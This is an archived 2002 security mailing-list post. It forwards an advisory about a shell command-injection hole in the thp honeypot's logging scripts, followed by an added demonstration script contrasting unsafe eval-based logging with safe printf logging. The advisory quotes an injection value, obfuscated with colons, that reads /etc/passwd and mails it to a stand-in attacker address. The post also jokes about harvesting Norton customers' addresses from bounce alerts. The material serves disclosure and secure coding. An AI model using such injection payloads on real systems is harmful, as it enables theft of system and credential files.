OSEC

 
From: George Bakos (gbakosists.dartmouth.edu)
Date: Wed Apr 24 2002 - 00:37:07 CDT


    For all those who are "blessed" with Norton's iron-clad A-V scanning, please note: The mail
    that it blocked was intended to alert you of a vulnerability, not exploit one. Perhaps Norton
    needs to refine their signatures a bit, lest more advisories fail to be delivered.

    Oh, by the way. Thank you, Norton, for letting me know the real names & mail identities of all
    of the list members whose servers bounced this. Lance, I guess you may as well turn on the
    "allow subscriber list queries" feature, since it is so easily circumvented. Come to think of
    it (actually, someone here just suggested it), I think I'll start buying those cd-roms full of
    email addresses, send this string to them, then use Norton's "alert" to build a list of Norton
    customers. Do you think NAI would be interested in this? Thank you, Norton, for being such a
    responsible member of the security community.

    Here is the evil, horrible, virus-laden message that was blocked. I have put colons in between
    the offending characters, so as not to set off any more alarms.

    <----------evil, horrible virus-laden message follows--------->

    There is a vulnerability with the way thp reads data from the intruder's
    keystrokes & either logs or returns a response. It allows an attacker to execute
    commands on the thp host with user "nobody" privilege.

    EXPLANATION
    In shell, "read VAR ;echo $VAR > file" seems innocuous at first, however, entering
    a value of
                         (Time to remove those colons, folks)
    $:(:c:a:t: :/:e:t:c:/:p:a:s:s:w:d: :|: :m:a:i:l: :b:a:d:g:u:y::o:o:p:s:.:n:e:t: :-:s:
    :o:o:p:s:)
                            (stop removing colons here)
    will do just that.
    Quoting is easily circumvented by including the required closing quotes in the
    value entered, thus ineffective.
    This problem exists in a number of locations in logthis and thpsvcs.

    I'm fixing the problem by using stty to return the keystrokes individually,
    treating carriage returns as a character and returning the prompt on its presence.
    I'll have it posted later today.

    Until then, I have shut down the webserver alpinista.dyndns.org:81 and advise any
    thp users to turn off xinetd until the fix is available. I'll notify the list
    when it is ready.

    gb

    <----------end of evil, horrible virus-laden message--------->
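
The injection the message describes, next to a logging form that avoids it, as an added example that is not part of the original post and is not thp's code. It assumes the entered value reaches a second round of shell parsing (modelled here with `eval`); the function names and the harmless sample values are constructed.

```shell
#!/bin/sh
# Added illustration. The function names and the eval-based logger are
# assumptions, not code from thp's logthis or thpsvcs.

# Constructed, harmless stand-ins for an intruder's keystrokes.
SAMPLE='$(echo INJECTED)'
SAMPLE_Q="'\$(echo INJECTED)'"   # same value carrying its own closing quotes

# Unsafe: the value is spliced into a command string and parsed a second
# time, so the embedded command substitution runs.
log_unsafe() { eval "echo $1" > "$2"; }

# Still unsafe: single quotes around the value stop SAMPLE, but SAMPLE_Q
# closes the quote itself and the substitution runs again.
log_quoted_unsafe() { eval "echo '$1'" > "$2"; }

# Safe: the value is only ever data. A fixed printf format plus a quoted
# expansion writes the bytes as typed; nothing is re-parsed.
log_safe() { printf '%s\n' "$1" > "$2"; }

# Safe reader: -r disables backslash processing, IFS= keeps whitespace.
read_and_log() {
    IFS= read -r line || [ -n "$line" ]
    log_safe "$line" "$1"
}

# Helper: run logger $1 on value $2 and return what ended up in the log.
logged_with() {
    f=$(mktemp)
    "$1" "$2" "$f"
    cat "$f"
    rm -f "$f"
}

printf 'unsafe, plain value  : %s\n' "$(logged_with log_unsafe "$SAMPLE")"
printf 'quoted, plain value  : %s\n' "$(logged_with log_quoted_unsafe "$SAMPLE")"
printf 'quoted, closing quote: %s\n' "$(logged_with log_quoted_unsafe "$SAMPLE_Q")"
printf 'safe, closing quote  : %s\n' "$(logged_with log_safe "$SAMPLE_Q")"
```

A log line that shows `INJECTED` means the typed text was executed; a line that shows the text exactly as typed means it was stored as data.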
